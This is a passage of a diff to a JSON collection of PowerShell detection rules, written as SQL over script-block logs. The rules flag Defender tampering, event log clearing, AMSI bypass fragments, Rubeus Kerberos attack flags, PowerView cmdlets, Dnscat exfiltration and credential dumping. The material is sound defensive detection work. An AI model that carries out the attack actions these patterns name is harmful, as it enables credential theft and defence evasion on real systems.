ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_susp_ad_group_reco.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "author": "frack113", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "status": "experimental", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", "status": "test", - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1201" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.003" + "attack.persistence", + "attack.t1136.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1497.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", - "id": "96cd126d-f970-49c4-848a-da3a09f55c55", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "status": "experimental", - "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_set_alias.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "title": "Active Directory Group Enumeration With Get-AdGroup", + "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.discovery", + "attack.t1069.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_get_adgroup.yml" }, { - "title": "Suspicious Get-WmiObject", - "id": "0332a266-b584-47b4-933d-a00b103e1b37", + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", "status": "experimental", - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546" - ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate administrative script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_gwmi.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", - "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE 